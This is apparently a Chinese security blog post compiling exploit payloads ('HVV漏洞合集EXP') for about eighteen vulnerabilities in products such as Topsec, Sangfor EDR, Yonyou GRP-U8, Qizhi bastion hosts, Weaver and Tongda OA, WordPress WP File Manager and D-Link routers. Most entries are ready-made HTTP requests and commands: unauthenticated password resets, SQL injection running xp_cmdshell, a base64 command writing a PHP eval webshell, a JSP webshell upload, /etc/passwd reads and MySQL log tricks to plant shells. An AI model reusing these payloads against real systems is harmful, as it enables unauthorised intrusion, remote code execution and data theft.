乐于分享 共同成长

JE2Se ,一个不怎么努力上进的小菜鸡

HVV漏洞合集EXP

1、天融信数据防泄漏系统越权修改管理员密码

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。

POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

2、绿盟UTS综合威胁探针管理员任意登录

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

利用渠道的md5值去登录页面

3、天融信TopApp-LB 负载均衡系统sql注入

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, /
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr(‘a’,1,1),11,12,13,14,15,16,17,18,19,20,21,22—+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

4、用友GRP-u8 注入

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>


5、宝塔Nginx解析漏洞

本地写一个
<?php phpinfo(); ?>

另存为.jpg格式
直接上传文件,不需要做任何修改:
访问上传文件地址:

在upload/1.jpg 后面加/.php

6、深信服EDR漏洞RCE

绕过:{“params”:”w=123\”‘1234123’\”|命令”}

结果如下:
《HVV漏洞合集EXP》
返回:
《HVV漏洞合集EXP》

7、齐治堡垒机前台远程命令执行漏洞

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)
未授权无需登录。
1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.
2、访问如下链接即可getshell,执行成功后,生成PHP一句话马
3、/var/www/shterm/resources/qrcode/lbj77.php 密码10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

《HVV漏洞合集EXP》

8、泛微OA云桥任意文件读取

未授权任意文件读取,

GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 
User-Agent: curl/7.29.0 
Host: xxxxx 
Accept: */*

9、宝塔面板phpMyadmin未授权访问

前段时间在朋友圈和微信群里火热不行的宝塔数据库面板未授权无需登录,以下是存在安全问题的版本。

1、宝塔默认phpMyadmin端口就是888 而这个漏洞排查方式极其简单 172.10.0.121:888/pma
2、如果宝塔是存在安全问题的版本,那就会直接出现phpMyadmin面板页面。
《HVV漏洞合集EXP》

10、Exchange Server 远程代码执行漏洞

微软公告说的很明显,只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令。
https://srcincite.io/pocs/cve-2020-16875.py.txt
https://srcincite.io/pocs/cve-2020-16875.ps1.txt

researcher@incite:~$ ./poc.py (+) usage: ./poc.py <target> <user:pass> <cmd>
(+) eg: ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint 
researcher@incite:~$ ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint
(+) logged in as harrym@exchangedemo.com 
(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5
(+) triggered rce as SYSTEM!

11、PhpStudy nginx解析漏洞

1、利用条件就只需要把php恶意文件上传(oss不算!)到服务器。
<?php phpinfo();?>

2、通过 /x.txt/x.php 方式访问上传的图片地址,啪嚓! 就解析了php代码。

12、深信服EDR后台任意用户登陆漏洞

Payload

/ui/login.php?user=username

输入上面的Payload只要这样一下,成功绕过

https://127.0.0.1:9443/ui/login.php?user=username

《HVV漏洞合集EXP》
成功绕过登录后台
《HVV漏洞合集EXP》

13、深信服EDR远程命令执行漏洞CNVD-2020-46552

攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。国家信息安全漏洞共享平台(CNVD)已于8月18日收录该漏洞。CNVD对该漏洞的综合评级为“高危,漏洞影响版本v3.2.16-19”。

1)构造Payload,这里漏洞文件是c.php,漏洞参数是host

/tool/log/c.php?strip_slashes=system&host=id2)

root权限

《HVV漏洞合集EXP》

14、WordPress插件WP File Manager的0day漏洞

访问这个文件
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

显示是json
第一步先Get请求如下

https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=1.php&target=l1_Lw

第二步post下面的包到这个地址

https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

post内容:

cmd=put&target=l1_MS5waHA%3D&content=马内容

即可在此目录可生成马

https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/files/1.php

网上实际能打的机器太少,希望大家能给出一些更好的语法能直接找到这类机器#

15、D-Link dir645 Service.Cgi远程命令执行

POST /service.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.1/
Content-Length: 17
Cookie: uid=NDRCRN78JY

EVENT=pwd%3bls%26

16、联软科技产品存在任意文件上传和命令执行漏洞

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

17、通达OA v11.7后台SQL注入到RCE

添加用户:

grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

然后该用户是对mysql数据库拥有所有权限的,然后给自己加权限:

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
然后用注入点刷新权限,因为该用户是没有刷新权限的权限的:
general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
这样就拥有了所有权限。再次登录:
提示这个,或者让改密码死活改不了。再执行一下
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

查路径
select @@basedir; # c:\td0a117\mysql5\,那么web目录就是c:\td0a117\webroot\

方法1:
set global slow_query_log=on; set global slow_query_log_file='C:/td0a117/webroot/tony.php'; select '<?php eval($_POST[x]);?>' or sleep(11);
方法2:
set global general_log = on;
set global general_log_file = 'C:/td0a117/webroot/tony2.php';
select '<?php eval($_POST[x]);?>';
show variables like '%general%';

18、泛微云桥另一处任意文件读取与写入漏洞

演示效果如下:
《HVV漏洞合集EXP》

点赞
  1. daryman.us说道:

    Hey bro, would love to hear more abt your experience with LSD sometime :
    D

发表评论

电子邮件地址不会被公开。 必填项已用*标注

4 × 1 =